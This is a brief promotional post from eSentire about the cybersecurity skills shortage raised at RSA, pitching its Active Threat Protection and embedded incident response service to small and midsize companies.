We do appreciate the insights and believe that there is a thread at RSA pointing up the skills shortage in cyber security. This trend will not change any time soon, and smaller to midsize companies will be most impacted because they simply do not have the resources to staff a 24x7 security operations center in the same way that very large enterprises can.

At eSentire, we’ve developed a new approach to cyber security that we call Active Threat Protection. It is a combination of technology and expertise that fills the skills gap while eliminating all those false positives – and it’s surprisingly cost effective, so small to midsize companies can access it.

Embedded Cyber Security Incident Response is a core principle in Active Threat Protection, and it is certainly worth learning about if you have confidential data to protect yet limited resources to devote to security.

Tags: cyber security, Active Threat Protection, RSA
